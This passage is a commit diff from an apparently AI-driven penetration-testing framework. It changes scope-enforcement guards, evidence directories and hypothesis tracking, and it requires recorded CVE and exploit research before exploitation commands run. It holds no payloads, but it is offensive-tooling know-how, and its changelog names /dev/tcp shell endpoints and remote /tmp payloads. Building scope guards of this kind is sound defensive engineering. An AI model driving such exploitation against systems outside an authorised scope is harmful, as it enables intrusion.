mirror of
https://github.com/Strategic-Automation/violin.git
synced 2026-08-14 12:33:37 +02:00
Refactor playbooks and templates for improved evidence handling and research documentation
- Updated various playbooks to use `$ENG_DIR` for storing evidence files instead of hardcoded paths. - Enhanced documentation in playbooks to include mandatory CVE and exploit research fields in hypotheses. - Introduced a new `pty-safe-delivery.md` reference for safe file delivery practices over PTY. - Added a `shell_ctrl.py` template for PTY shell control with safeguards against long commands and file transfers. - Improved tests to validate new hypothesis fields and ensure compliance with updated playbook requirements. - General cleanup and consistency improvements across playbooks and templates.
This commit is contained in:
@@ -1,5 +1,17 @@
|
||||
# Changelog
|
||||
|
||||
## Unreleased
|
||||
|
||||
- Replaced regex-based target parsing with Python standard-library shell, URL, IP/CIDR, and MIME parsers; this keeps scope enforcement dependency-free while reducing parser ambiguity.
|
||||
- Moved target parsing and target-scope enforcement into `core/targets.py`, leaving the command guard focused on policy orchestration.
|
||||
- Allowed `violin_record_ptt` to start one untouched phase-bound task, removing the initial active-task deadlock while retaining fail-closed batch reviews.
|
||||
- Made hypothesis parsing field-order independent and fixed template rewrites so recorded hypotheses are never written inside the template comment.
|
||||
- Clarified typed nmap all-port input: use `ports: "1-65535"`, not the `-p-` flag form.
|
||||
- Bootstrap engagement-local `exploits/` and phase evidence directories, and direct local scripts and output away from `/tmp` while preserving explicitly labelled remote-target `/tmp` payloads.
|
||||
- Fixed target extraction so local dotted output/script names are not treated as hosts, and Bash `/dev/tcp` or `/dev/udp` endpoints retain their full host and port boundary.
|
||||
- Canonicalized hypothesis IDs supplied as `H-001`, removed malformed duplicate headings on rewrite, and compare scoped hypothesis targets correctly when they include a URL or port.
|
||||
- Kept review binding fail-closed while removing the need to manually copy an opaque pending batch ID into every PTT note.
|
||||
|
||||
## 1.3.1
|
||||
|
||||
- Enforced scope authorisation, exclusions, phase-aligned PTT tasks, and relevant hypotheses at the execution boundary.
|
||||
|
||||
@@ -30,7 +30,7 @@ hermes -p violin
|
||||
<table>
|
||||
<tr><td width="280"><b>🔬 31 Methodology Playbooks</b></td><td>7 methodology playbooks (6 phase: scoping, recon, vuln-research, exploitation, reporting, post-exploitation — plus a tools catalog) + 24 per-vulnerability-class playbooks covering OWASP Top 10, OWASP API Top 10, LLM Top 10, and beyond.</td></tr>
|
||||
<tr><td><b>🛡️ Multi-Layer Safety</b></td><td>Interactive scoping (8 questions) → scope validation → guard check → approval gates — every target-touching command validated before execution.</td></tr>
|
||||
<tr><td><b>🧠 Pentesting Task Tree</b></td><td>Structured artifact tracking every task via `[x]/[ ]/[~]` markers across phases, with command history and hypothesis linking.</td></tr>
|
||||
<tr><td><b>🧠 Pentesting Task Tree</b></td><td>Structured artifact tracking every task via `[x]/[ ]/[~]` markers across phases, with executor-owned history, hypothesis linking, and guard-bound batch reviews.</td></tr>
|
||||
<tr><td><b>🌐 Browser + Web Research</b></td><td>Browser toolset for website enumeration. Web toolset for CVE lookup, exploit search, and OSINT.</td></tr>
|
||||
<tr><td><b>📋 Evidence-Driven Reporting</b></td><td>Reproducible evidence with screenshots, tool output, request/response pairs. CVSS 3.1 scoring + auto-patch remediation.</td></tr>
|
||||
<tr><td><b>🔗 Hermes-Native</b></td><td>Inherits your existing Hermes provider/model. No extra API keys, no per-profile credentials, no lock-in.</td></tr>
|
||||
|
||||
@@ -56,6 +56,8 @@ def build_nmap(args: dict) -> str:
|
||||
|
||||
if args.get("ports"):
|
||||
ports = str(args["ports"])
|
||||
if ports == "-p-":
|
||||
raise AdapterError("ports is a port specification; use '1-65535' for all ports")
|
||||
if not re.fullmatch(r"[0-9,-]+", ports):
|
||||
raise AdapterError("ports must contain only digits, commas, and hyphens")
|
||||
parts.extend(["-p", ports])
|
||||
|
||||
@@ -12,6 +12,8 @@ from pathlib import Path
|
||||
|
||||
import yaml
|
||||
|
||||
from . import state
|
||||
|
||||
__all__ = [
|
||||
"init_engagement",
|
||||
"check_bootstrap",
|
||||
@@ -28,6 +30,19 @@ _REPAIR_TEMPLATES = {
|
||||
}
|
||||
|
||||
|
||||
_ARTIFACT_DIRECTORIES = (
|
||||
"exploits",
|
||||
"evidence/recon",
|
||||
"evidence/vuln-research",
|
||||
"evidence/exploitation",
|
||||
"evidence/post-exploitation",
|
||||
"evidence/privesc",
|
||||
"evidence/flags",
|
||||
"evidence/reporting",
|
||||
"evidence/retrospective",
|
||||
)
|
||||
|
||||
|
||||
class BootstrapResult:
|
||||
def __init__(
|
||||
self,
|
||||
@@ -169,11 +184,13 @@ def init_engagement(
|
||||
eng_dir: str | Path, host: str | None = None, *, ctf: bool = False, session_id: str = ""
|
||||
) -> int:
|
||||
"""Create a complete, guard-clean engagement directory from templates."""
|
||||
eng_dir = Path(eng_dir)
|
||||
eng_dir = state._eng_dir(eng_dir)
|
||||
result = BootstrapResult()
|
||||
host = (host or "").strip() or _derive_host(eng_dir)
|
||||
|
||||
eng_dir.mkdir(parents=True, exist_ok=True)
|
||||
for rel in _ARTIFACT_DIRECTORIES:
|
||||
(eng_dir / rel).mkdir(parents=True, exist_ok=True)
|
||||
for rel, (template_rel, placeholder) in _REPAIR_TEMPLATES.items():
|
||||
target = eng_dir / rel
|
||||
if target.exists():
|
||||
@@ -211,7 +228,7 @@ def check_bootstrap(
|
||||
) -> BootstrapResult:
|
||||
"""Verify engagement bootstrap is complete (and optionally auto-repair)."""
|
||||
result = BootstrapResult()
|
||||
eng_dir = Path(eng_dir)
|
||||
eng_dir = state._eng_dir(eng_dir)
|
||||
|
||||
if not eng_dir.exists():
|
||||
result.add_error("BOOTSTRAP REQUIRED: engagement directory not found")
|
||||
@@ -297,6 +314,12 @@ def _auto_repair_corrupt_artifacts(eng_dir: Path, result: BootstrapResult) -> Bo
|
||||
except Exception as exc:
|
||||
new_errors.append(f"AUTO-REPAIR FAILED creating {eng_dir}: {exc}")
|
||||
|
||||
for rel in _ARTIFACT_DIRECTORIES:
|
||||
try:
|
||||
(eng_dir / rel).mkdir(parents=True, exist_ok=True)
|
||||
except OSError as exc:
|
||||
new_errors.append(f"AUTO-REPAIR FAILED creating {eng_dir / rel}: {exc}")
|
||||
|
||||
for rel, (template_rel, placeholder) in _REPAIR_TEMPLATES.items():
|
||||
target = eng_dir / rel
|
||||
|
||||
|
||||
@@ -6,7 +6,6 @@ No subprocess calls — pure functions returning dataclasses.
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import ipaddress
|
||||
import re
|
||||
from dataclasses import dataclass, field
|
||||
from datetime import UTC, datetime
|
||||
@@ -15,6 +14,7 @@ from typing import Any
|
||||
|
||||
from . import bootstrap, hypotheses, ptt, state
|
||||
from .phases import Phase, normalize_phase, requires_hypothesis
|
||||
from .targets import check_scope_targets, extract_target_candidates, normalise_target
|
||||
|
||||
__all__ = [
|
||||
"CheckCommandArgs",
|
||||
@@ -236,144 +236,12 @@ def check_destructive_patterns(command: str) -> CheckResult:
|
||||
return result
|
||||
|
||||
|
||||
# --------------------------------------------------------------------------- #
|
||||
# SCOPE TARGET ENFORCEMENT (audit P0: command targets were never compared with
|
||||
# the engagement's allowed hosts). IPv4/CIDR literals must appear in scope;
|
||||
# unknown hostnames force a REVIEW rather than a silent pass.
|
||||
# --------------------------------------------------------------------------- #
|
||||
def check_local_artifact_paths(command: str) -> CheckResult:
|
||||
"""Remind operators that locally-created scripts belong in the engagement."""
|
||||
|
||||
_IPV4_CIDR = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}(?:/\d{1,2})?")
|
||||
_HOST_PORT = re.compile(r"\b([A-Za-z0-9](?:[A-Za-z0-9-]*\.)*[A-Za-z0-9-]+):\d{1,5}\b")
|
||||
_FQDN = re.compile(r"\b([A-Za-z0-9](?:[A-Za-z0-9-]*\.)+[A-Za-z]{2,})\b")
|
||||
|
||||
|
||||
def _extract_target_candidates(command: str) -> list[str]:
|
||||
"""Ordered, de-duplicated host/IP candidates from a command line."""
|
||||
cands: list[str] = []
|
||||
for m in re.finditer(r"https?://([^\s'\"<>]+)", command):
|
||||
host = m.group(1).split("/")[0].split("@")[-1]
|
||||
if ":" in host:
|
||||
host = host.split(":", 1)[0]
|
||||
if host:
|
||||
cands.append(host.lower())
|
||||
for m in _IPV4_CIDR.finditer(command):
|
||||
cands.append(m.group(0).lower())
|
||||
# Validate colon-containing tokens with ipaddress instead of treating the
|
||||
# leading hextet of an IPv6 address as a host:port pair.
|
||||
for token in re.findall(r"(?<![\w:])\[?[0-9A-Fa-f:]{2,}\]?(?:/\d{1,3})?", command):
|
||||
candidate = token.strip("[]").lower()
|
||||
try:
|
||||
ipaddress.ip_network(candidate, strict=False)
|
||||
except ValueError:
|
||||
continue
|
||||
cands.append(candidate)
|
||||
for m in _HOST_PORT.finditer(command):
|
||||
cands.append(m.group(1).lower())
|
||||
for m in _FQDN.finditer(command):
|
||||
cands.append(m.group(1).lower())
|
||||
seen: set[str] = set()
|
||||
out: list[str] = []
|
||||
for c in cands:
|
||||
if c and c not in seen:
|
||||
seen.add(c)
|
||||
out.append(c)
|
||||
return out
|
||||
|
||||
|
||||
def _values(value: Any):
|
||||
if isinstance(value, dict):
|
||||
for nested in value.values():
|
||||
yield from _values(nested)
|
||||
elif isinstance(value, list):
|
||||
for nested in value:
|
||||
yield from _values(nested)
|
||||
elif value is not None:
|
||||
yield str(value)
|
||||
|
||||
|
||||
def _normalise_scope_host(value: str) -> str:
|
||||
match = re.match(r"https?://([^\s/]+)", value, flags=re.IGNORECASE)
|
||||
host = match.group(1) if match else value
|
||||
if host.startswith("[") and "]" in host:
|
||||
return host[1 : host.index("]")].lower()
|
||||
return host.rsplit(":", 1)[0].lower() if host.count(":") == 1 else host.lower()
|
||||
|
||||
|
||||
def _scope_allowed_hosts(scope: dict) -> set[str]:
|
||||
allowed: set[str] = set()
|
||||
targets = scope.get("targets", {}) or {}
|
||||
for key in ("ip_addresses", "in_scope_urls", "urls", "domains", "hostnames", "roles"):
|
||||
for value in _values(targets.get(key, [])):
|
||||
allowed.add(_normalise_scope_host(value))
|
||||
return allowed
|
||||
|
||||
|
||||
def _scope_excluded_hosts(scope: dict) -> set[str]:
|
||||
excluded: set[str] = set()
|
||||
for item in _values(scope.get("exclusions", {})):
|
||||
excluded.add(_normalise_scope_host(item))
|
||||
return excluded
|
||||
|
||||
|
||||
def _scope_networks(scope: dict, section: str) -> list[ipaddress._BaseNetwork]:
|
||||
values = []
|
||||
targets = scope.get(section, {}) or {}
|
||||
for key in ("ip_addresses", "cidrs"):
|
||||
values.extend(_values(targets.get(key, [])))
|
||||
networks = []
|
||||
for value in values:
|
||||
try:
|
||||
networks.append(ipaddress.ip_network(value, strict=False))
|
||||
except ValueError:
|
||||
continue
|
||||
return networks
|
||||
|
||||
|
||||
def _matches_network(candidate: str, networks: list[ipaddress._BaseNetwork]) -> bool:
|
||||
try:
|
||||
network = ipaddress.ip_network(candidate, strict=False)
|
||||
except ValueError:
|
||||
return False
|
||||
return any(
|
||||
network.version == allowed.version and network.subnet_of(allowed) for allowed in networks
|
||||
)
|
||||
|
||||
|
||||
def check_scope_targets(scope_path: Path, command: str) -> CheckResult:
|
||||
"""Block commands whose IP/CIDR target is outside the engagement scope."""
|
||||
result = CheckResult()
|
||||
if not scope_path.exists():
|
||||
return result
|
||||
try:
|
||||
import yaml
|
||||
|
||||
data = yaml.safe_load(scope_path.read_text(encoding="utf-8")) or {}
|
||||
except Exception:
|
||||
return result
|
||||
if not isinstance(data, dict):
|
||||
return result
|
||||
|
||||
allowed = _scope_allowed_hosts(data)
|
||||
excluded = _scope_excluded_hosts(data)
|
||||
allowed_networks = _scope_networks(data, "targets")
|
||||
excluded_networks = _scope_networks(data, "exclusions")
|
||||
for cand in _extract_target_candidates(command):
|
||||
if cand in excluded or _matches_network(cand, excluded_networks):
|
||||
result.add_error(f"excluded target {cand} must not be touched")
|
||||
continue
|
||||
if cand in allowed:
|
||||
continue
|
||||
if _matches_network(cand, allowed_networks):
|
||||
continue
|
||||
try:
|
||||
ipaddress.ip_network(cand, strict=False)
|
||||
is_ip = True
|
||||
except ValueError:
|
||||
is_ip = False
|
||||
if is_ip:
|
||||
result.add_error(f"out-of-scope target {cand} (not present in scope.yaml)")
|
||||
else:
|
||||
result.add_warning(f"host {cand} is not present in scope.yaml; verify authorization")
|
||||
if re.search(r"(?:>|\btee\s+)\s*/tmp/[^\s]+\.(?:py|pl|rb|sh)(?=\s|$)", command):
|
||||
result.add_info("local script path uses /tmp; save it under $ENG_DIR/exploits instead")
|
||||
return result
|
||||
|
||||
|
||||
@@ -384,10 +252,18 @@ def check_skill_load(eng_dir: Path, session_id: str, mandatory: bool = True) ->
|
||||
result.marker_path = str(marker)
|
||||
|
||||
if not marker.exists():
|
||||
stale_markers = sorted((eng_dir / "state").glob(".skill-loaded-*"))
|
||||
stale_hint = ""
|
||||
if stale_markers:
|
||||
names = ", ".join(candidate.name for candidate in stale_markers[:3])
|
||||
stale_hint = (
|
||||
f"; found marker(s) for another session: {names}. "
|
||||
f"After loading the skill, create the canonical marker: {marker}"
|
||||
)
|
||||
if mandatory:
|
||||
result.add_error("skill-load gate not satisfied: marker missing")
|
||||
result.add_error(f"skill-load gate not satisfied: marker missing{stale_hint}")
|
||||
else:
|
||||
result.add_warning("skill-load marker missing (non-mandatory mode)")
|
||||
result.add_warning(f"skill-load marker missing (non-mandatory mode){stale_hint}")
|
||||
return result
|
||||
|
||||
content = marker.read_text(encoding="utf-8").strip()
|
||||
@@ -456,7 +332,7 @@ def check_hypothesis_freshness(eng_dir: Path, phase: Phase, command: str) -> Hyp
|
||||
Phase.PRIVESC: {Phase.EXPLOITATION, Phase.POST_EXPLOITATION, Phase.PRIVESC},
|
||||
Phase.FLAGS: {Phase.PRIVESC, Phase.FLAGS},
|
||||
}.get(phase, {phase})
|
||||
targets = set(_extract_target_candidates(command))
|
||||
targets = {normalise_target(target) for target in extract_target_candidates(command)}
|
||||
relevant = []
|
||||
for hypothesis in hyps:
|
||||
if hypothesis.canonical_status() == "Rejected" or not hypothesis.target:
|
||||
@@ -465,15 +341,47 @@ def check_hypothesis_freshness(eng_dir: Path, phase: Phase, command: str) -> Hyp
|
||||
hypothesis_phase = normalize_phase(hypothesis.phase)
|
||||
except ValueError:
|
||||
continue
|
||||
target = _normalise_scope_host(hypothesis.target)
|
||||
target = normalise_target(hypothesis.target)
|
||||
if hypothesis_phase in acceptable_phases and (not targets or target in targets):
|
||||
relevant.append(hypothesis)
|
||||
if not relevant:
|
||||
eligible = [
|
||||
f"H-{h.id}@{normalise_target(h.target)}"
|
||||
for h in hyps
|
||||
if h.canonical_status() != "Rejected" and h.target
|
||||
]
|
||||
result.add_error(
|
||||
f"phase {phase.value} requires a non-rejected hypothesis matching the command target"
|
||||
f"phase {phase.value} requires a non-rejected hypothesis matching the command target; "
|
||||
f"parsed targets: {', '.join(sorted(targets)) or 'none'}; "
|
||||
f"available hypotheses: {', '.join(eligible) or 'none'}"
|
||||
)
|
||||
return result
|
||||
|
||||
if phase in {
|
||||
Phase.EXPLOITATION,
|
||||
Phase.POST_EXPLOITATION,
|
||||
Phase.PRIVESC,
|
||||
Phase.FLAGS,
|
||||
}:
|
||||
researched = [h for h in relevant if h.cve_research.strip() and h.exploit_research.strip()]
|
||||
if not researched:
|
||||
missing = []
|
||||
for h in relevant:
|
||||
fields = []
|
||||
if not h.cve_research.strip():
|
||||
fields.append("CVE Research")
|
||||
if not h.exploit_research.strip():
|
||||
fields.append("Exploit Research")
|
||||
missing.append(f"H-{h.id} missing {' and '.join(fields)}")
|
||||
result.add_error(
|
||||
"online research must be attempted and recorded before exploit execution; "
|
||||
+ "; ".join(missing)
|
||||
+ ". Record each query/source and outcome; 'no results', 'not applicable', "
|
||||
"or 'source unavailable' are valid outcomes when truthful."
|
||||
)
|
||||
return result
|
||||
relevant = researched
|
||||
|
||||
# Check for stale hypotheses (no update in 48h)
|
||||
stale = 0
|
||||
now = datetime.now(UTC)
|
||||
@@ -509,7 +417,7 @@ def check_hypothesis_freshness(eng_dir: Path, phase: Phase, command: str) -> Hyp
|
||||
|
||||
def check_command(args: CheckCommandArgs) -> CheckResult:
|
||||
"""Run all sub-guards for a target command."""
|
||||
eng_dir = Path(args.eng_dir)
|
||||
eng_dir = state._eng_dir(args.eng_dir)
|
||||
scope_path = Path(args.scope)
|
||||
phase = normalize_phase(args.phase)
|
||||
|
||||
@@ -539,6 +447,9 @@ def check_command(args: CheckCommandArgs) -> CheckResult:
|
||||
destructive_result = check_destructive_patterns(args.command)
|
||||
result.errors.extend(destructive_result.errors)
|
||||
|
||||
artifact_result = check_local_artifact_paths(args.command)
|
||||
result.infos.extend(artifact_result.infos)
|
||||
|
||||
# 3. Skill-load gate (mandatory). Without a session_id the command cannot
|
||||
# be authorized at all.
|
||||
if not args.session_id:
|
||||
|
||||
@@ -60,7 +60,7 @@ def _read_json(path: Path) -> dict[str, Any]:
|
||||
|
||||
|
||||
def _resolve_engagement(eng_dir: str) -> Path:
|
||||
path = Path(eng_dir).resolve()
|
||||
path = state._eng_dir(eng_dir)
|
||||
if not path.is_dir():
|
||||
raise ValueError(f"engagement directory not found: {path}")
|
||||
return path
|
||||
|
||||
@@ -9,11 +9,11 @@ valid phase, and a target that is in scope (audit P1-hyp).
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import re
|
||||
from dataclasses import dataclass, field
|
||||
from datetime import UTC, datetime
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
from urllib.parse import urlsplit
|
||||
|
||||
from .phases import normalize_phase
|
||||
|
||||
@@ -36,19 +36,23 @@ LEGACY_ALIASES = {
|
||||
}
|
||||
ALL_STATES = CANONICAL_STATES + tuple(LEGACY_ALIASES.keys())
|
||||
|
||||
_HYPOTHESIS_RE = re.compile(
|
||||
r"^###\s+H-(?P<id>\d+)\s*:\s*(?P<title>[^\n]+)\n"
|
||||
r"(?:- \*\*Status:\*\*\s*(?P<status>[^\n]+)\n)?"
|
||||
r"(?:- \*\*Phase:\*\*\s*(?P<phase>[^\n]+)\n)?"
|
||||
r"(?:- \*\*Service:\*\*\s*(?P<service>[^\n]+)\n)?"
|
||||
r"(?:- \*\*Port:\*\*\s*(?P<port>[^\n]+)\n)?"
|
||||
r"(?:- \*\*Target:\*\*\s*(?P<target>[^\n]+)\n)?"
|
||||
r"(?:- \*\*Vuln Class:\*\*\s*(?P<vuln_class>[^\n]+)\n)?"
|
||||
r"(?:- \*\*Rationale:\*\*\s*(?P<rationale>[^\n]+)\n)?"
|
||||
r"(?:- \*\*Evidence:\*\*\s*(?P<evidence>[^\n]+)\n)?"
|
||||
r"(?:- \*\*Updated:\*\*\s*(?P<updated>[^\n]+)\n)?",
|
||||
re.MULTILINE,
|
||||
)
|
||||
_FIELD_NAMES = {
|
||||
"status": "status",
|
||||
"phase": "phase",
|
||||
"service": "service",
|
||||
"port": "port",
|
||||
"target": "target",
|
||||
"vuln class": "vuln_class",
|
||||
"rationale": "rationale",
|
||||
"evidence": "evidence",
|
||||
"cve research": "cve_research",
|
||||
"exploit research": "exploit_research",
|
||||
"test command": "test_command",
|
||||
"test response": "test_response",
|
||||
"verification status": "verification_status",
|
||||
"rejection reason": "rejection_reason",
|
||||
"updated": "updated",
|
||||
}
|
||||
|
||||
|
||||
@dataclass
|
||||
@@ -63,6 +67,12 @@ class Hypothesis:
|
||||
vuln_class: str = ""
|
||||
rationale: str = ""
|
||||
evidence: str = ""
|
||||
cve_research: str = ""
|
||||
exploit_research: str = ""
|
||||
test_command: str = ""
|
||||
test_response: str = ""
|
||||
verification_status: str = ""
|
||||
rejection_reason: str = ""
|
||||
updated: str = ""
|
||||
|
||||
def canonical_status(self) -> str:
|
||||
@@ -80,6 +90,12 @@ class Hypothesis:
|
||||
"vuln_class": self.vuln_class,
|
||||
"rationale": self.rationale,
|
||||
"evidence": self.evidence,
|
||||
"cve_research": self.cve_research,
|
||||
"exploit_research": self.exploit_research,
|
||||
"test_command": self.test_command,
|
||||
"test_response": self.test_response,
|
||||
"verification_status": self.verification_status,
|
||||
"rejection_reason": self.rejection_reason,
|
||||
"updated": self.updated,
|
||||
}
|
||||
|
||||
@@ -101,6 +117,18 @@ class Hypothesis:
|
||||
lines.append(f"- **Rationale:** {self.rationale}")
|
||||
if self.evidence:
|
||||
lines.append(f"- **Evidence:** {self.evidence}")
|
||||
if self.cve_research:
|
||||
lines.append(f"- **CVE Research:** {self.cve_research}")
|
||||
if self.exploit_research:
|
||||
lines.append(f"- **Exploit Research:** {self.exploit_research}")
|
||||
if self.test_command:
|
||||
lines.append(f"- **Test Command:** {self.test_command}")
|
||||
if self.test_response:
|
||||
lines.append(f"- **Test Response:** {self.test_response}")
|
||||
if self.verification_status:
|
||||
lines.append(f"- **Verification Status:** {self.verification_status}")
|
||||
if self.rejection_reason:
|
||||
lines.append(f"- **Rejection Reason:** {self.rejection_reason}")
|
||||
lines.append(f"- **Updated:** {self.updated or now} UTC")
|
||||
return "\n".join(lines) + "\n"
|
||||
|
||||
@@ -129,34 +157,81 @@ def _normalize_status(status: str) -> str:
|
||||
return LEGACY_ALIASES.get(status.strip(), status.strip())
|
||||
|
||||
|
||||
def parse_hypotheses(path: Path) -> list[Hypothesis]:
|
||||
"""Parse hypotheses.md into a list of Hypothesis objects.
|
||||
def _normalise_id(value: Any) -> str:
|
||||
"""Accept user-facing H-001 forms but persist the canonical numeric ID."""
|
||||
|
||||
HTML comments (e.g. template instructions wrapped in ``<!-- ... -->``) are
|
||||
stripped before parsing so placeholder examples in templates are never
|
||||
mistaken for real hypotheses.
|
||||
"""
|
||||
normalized = str(value or "").strip()
|
||||
while normalized.upper().startswith("H-"):
|
||||
normalized = normalized[2:].strip()
|
||||
if not normalized:
|
||||
return ""
|
||||
if not normalized.isdigit():
|
||||
raise ValueError("hypothesis id must be numeric or in the form H-001")
|
||||
return normalized.zfill(3)
|
||||
|
||||
|
||||
def _normalise_target(value: str) -> str:
|
||||
"""Compare URL and host:port hypothesis targets against scoped hosts."""
|
||||
|
||||
raw = value.strip().lower()
|
||||
if not raw:
|
||||
return ""
|
||||
parsed = urlsplit(raw if "://" in raw else f"//{raw}")
|
||||
return parsed.hostname.lower() if parsed.hostname else raw
|
||||
|
||||
|
||||
def parse_hypotheses(path: Path) -> list[Hypothesis]:
|
||||
"""Parse hypothesis headings and recognised fields in any field order."""
|
||||
if not path.exists():
|
||||
return []
|
||||
content = path.read_text(encoding="utf-8")
|
||||
content = re.sub(r"<!--.*?-->", "", content, flags=re.DOTALL)
|
||||
hypotheses = []
|
||||
for match in _HYPOTHESIS_RE.finditer(content):
|
||||
h = Hypothesis(
|
||||
id=match.group("id"),
|
||||
title=match.group("title").strip(),
|
||||
status=_normalize_status(match.group("status") or "Candidate"),
|
||||
phase=(match.group("phase") or "").strip(),
|
||||
service=(match.group("service") or "").strip(),
|
||||
port=(match.group("port") or "").strip(),
|
||||
target=(match.group("target") or "").strip(),
|
||||
vuln_class=(match.group("vuln_class") or "").strip(),
|
||||
rationale=(match.group("rationale") or "").strip(),
|
||||
evidence=(match.group("evidence") or "").strip(),
|
||||
updated=(match.group("updated") or "").strip(),
|
||||
records: list[Hypothesis] = []
|
||||
current: Hypothesis | None = None
|
||||
in_comment = False
|
||||
for raw_line in path.read_text(encoding="utf-8").splitlines():
|
||||
line = raw_line.strip()
|
||||
if "<!--" in line:
|
||||
in_comment = True
|
||||
if in_comment:
|
||||
if "-->" in line:
|
||||
in_comment = False
|
||||
continue
|
||||
heading = _parse_heading(line)
|
||||
if heading:
|
||||
if current:
|
||||
records.append(current)
|
||||
current = heading
|
||||
continue
|
||||
if current:
|
||||
_apply_field(current, line)
|
||||
if current:
|
||||
records.append(current)
|
||||
return records
|
||||
|
||||
|
||||
def _parse_heading(line: str) -> Hypothesis | None:
|
||||
if not line.startswith("### H-"):
|
||||
return None
|
||||
identifier, separator, title = line.removeprefix("### H-").partition(":")
|
||||
if not separator or not identifier.strip().isdigit() or not title.strip():
|
||||
return None
|
||||
return Hypothesis(id=identifier.strip(), title=title.strip())
|
||||
|
||||
|
||||
def _apply_field(hypothesis: Hypothesis, line: str) -> None:
|
||||
if not line.startswith("- **"):
|
||||
return
|
||||
label, separator, value = line.removeprefix("- **").partition(":")
|
||||
if not separator:
|
||||
return
|
||||
label = label.removesuffix("**")
|
||||
value = value.removeprefix("**")
|
||||
field = _FIELD_NAMES.get(label.strip().lower())
|
||||
if field:
|
||||
setattr(
|
||||
hypothesis,
|
||||
field,
|
||||
_normalize_status(value.strip()) if field == "status" else value.strip(),
|
||||
)
|
||||
hypotheses.append(h)
|
||||
return hypotheses
|
||||
|
||||
|
||||
def validate_hypotheses(hypotheses: list[Hypothesis]) -> HypothesisValidationResult:
|
||||
@@ -173,9 +248,30 @@ def validate_hypotheses(hypotheses: list[Hypothesis]) -> HypothesisValidationRes
|
||||
result.add_error(f"H-{h.id}: missing title")
|
||||
if not h.service and not h.port:
|
||||
result.add_warning(f"H-{h.id}: missing service and port")
|
||||
for error in _validate_rejection_fields(h.to_dict()):
|
||||
result.add_error(f"H-{h.id}: {error}")
|
||||
return result
|
||||
|
||||
|
||||
def _validate_rejection_fields(fields: dict[str, Any]) -> list[str]:
|
||||
"""Keep uncertain or undocumented failures from becoming permanent rejections."""
|
||||
|
||||
if _normalize_status(str(fields.get("status") or "Candidate")) != "Rejected":
|
||||
return []
|
||||
|
||||
errors: list[str] = []
|
||||
verification_status = str(fields.get("verification_status") or "").strip()
|
||||
if verification_status not in {"syntax_confirmed", "not_implemented"}:
|
||||
errors.append(
|
||||
"Rejected requires verification_status syntax_confirmed or not_implemented; "
|
||||
"syntax_uncertain/not_tested must remain active for re-test"
|
||||
)
|
||||
for field_name in ("test_command", "test_response", "rejection_reason"):
|
||||
if not str(fields.get(field_name) or "").strip():
|
||||
errors.append(f"Rejected requires {field_name}")
|
||||
return errors
|
||||
|
||||
|
||||
def find_by_service_port(
|
||||
hypotheses: list[Hypothesis], service: str, port: str
|
||||
) -> Hypothesis | None:
|
||||
@@ -210,11 +306,13 @@ def validate_hypothesis_record(
|
||||
normalize_phase(fields["phase"])
|
||||
except ValueError:
|
||||
errors.append(f"unknown phase '{fields['phase']}'")
|
||||
target = (fields.get("target") or "").strip().lower()
|
||||
if target and in_scope_hosts is not None and target not in in_scope_hosts:
|
||||
target = _normalise_target((fields.get("target") or "").strip())
|
||||
normalised_scope = {_normalise_target(host) for host in in_scope_hosts or set()}
|
||||
if target and in_scope_hosts is not None and target not in normalised_scope:
|
||||
errors.append(
|
||||
f"target '{target}' is not in scope; record a hypothesis only for in-scope hosts"
|
||||
)
|
||||
errors.extend(_validate_rejection_fields(fields))
|
||||
return errors
|
||||
|
||||
|
||||
@@ -230,19 +328,27 @@ def update_hypothesis(
|
||||
threaded into ``validate_hypothesis_record`` so an out-of-scope target is
|
||||
rejected fail-closed instead of being written to the board.
|
||||
"""
|
||||
normalized_fields = dict(fields)
|
||||
normalized_fields["id"] = _normalise_id(fields.get("id"))
|
||||
# Build the candidate record so we can validate before mutating the board.
|
||||
temp = Hypothesis(
|
||||
id=str(fields.get("id", "")).strip(),
|
||||
title=fields.get("title", "") or f"Hypothesis {fields.get('id', '')}",
|
||||
status=(fields.get("status") or "Candidate"),
|
||||
phase=(fields.get("phase") or "").strip(),
|
||||
service=(fields.get("service") or "").strip(),
|
||||
port=(fields.get("port") or "").strip(),
|
||||
target=(fields.get("target") or "").strip(),
|
||||
vuln_class=(fields.get("vuln_class") or "").strip(),
|
||||
rationale=(fields.get("rationale") or "").strip(),
|
||||
evidence=(fields.get("evidence") or "").strip(),
|
||||
updated=(fields.get("updated") or "").strip(),
|
||||
id=normalized_fields["id"],
|
||||
title=normalized_fields.get("title", "") or f"Hypothesis {normalized_fields['id']}",
|
||||
status=(normalized_fields.get("status") or "Candidate"),
|
||||
phase=(normalized_fields.get("phase") or "").strip(),
|
||||
service=(normalized_fields.get("service") or "").strip(),
|
||||
port=(normalized_fields.get("port") or "").strip(),
|
||||
target=(normalized_fields.get("target") or "").strip(),
|
||||
vuln_class=(normalized_fields.get("vuln_class") or "").strip(),
|
||||
rationale=(normalized_fields.get("rationale") or "").strip(),
|
||||
evidence=(normalized_fields.get("evidence") or "").strip(),
|
||||
cve_research=(normalized_fields.get("cve_research") or "").strip(),
|
||||
exploit_research=(normalized_fields.get("exploit_research") or "").strip(),
|
||||
test_command=(normalized_fields.get("test_command") or "").strip(),
|
||||
test_response=(normalized_fields.get("test_response") or "").strip(),
|
||||
verification_status=(normalized_fields.get("verification_status") or "").strip(),
|
||||
rejection_reason=(normalized_fields.get("rejection_reason") or "").strip(),
|
||||
updated=(normalized_fields.get("updated") or "").strip(),
|
||||
)
|
||||
errors = validate_hypothesis_record(temp.to_dict(), in_scope_hosts=in_scope_hosts)
|
||||
if errors:
|
||||
@@ -266,7 +372,7 @@ def update_hypothesis(
|
||||
hypotheses.append(target)
|
||||
|
||||
# Update fields
|
||||
for key, value in fields.items():
|
||||
for key, value in normalized_fields.items():
|
||||
if key == "id":
|
||||
continue
|
||||
if hasattr(target, key):
|
||||
@@ -284,6 +390,14 @@ def _rewrite_hypotheses(path: Path, hypotheses: list[Hypothesis]) -> None:
|
||||
"""Rewrite the entire hypotheses file."""
|
||||
path.parent.mkdir(parents=True, exist_ok=True)
|
||||
template = path.read_text(encoding="utf-8") if path.exists() else "# Hypothesis Board\n\n"
|
||||
# Template instructions are an HTML comment containing an example H-001
|
||||
# heading. Remove that comment before locating real records, otherwise a
|
||||
# newly written hypothesis is accidentally placed inside the comment.
|
||||
comment_start = template.find("<!--")
|
||||
if comment_start != -1:
|
||||
comment_end = template.find("-->", comment_start)
|
||||
if comment_end != -1:
|
||||
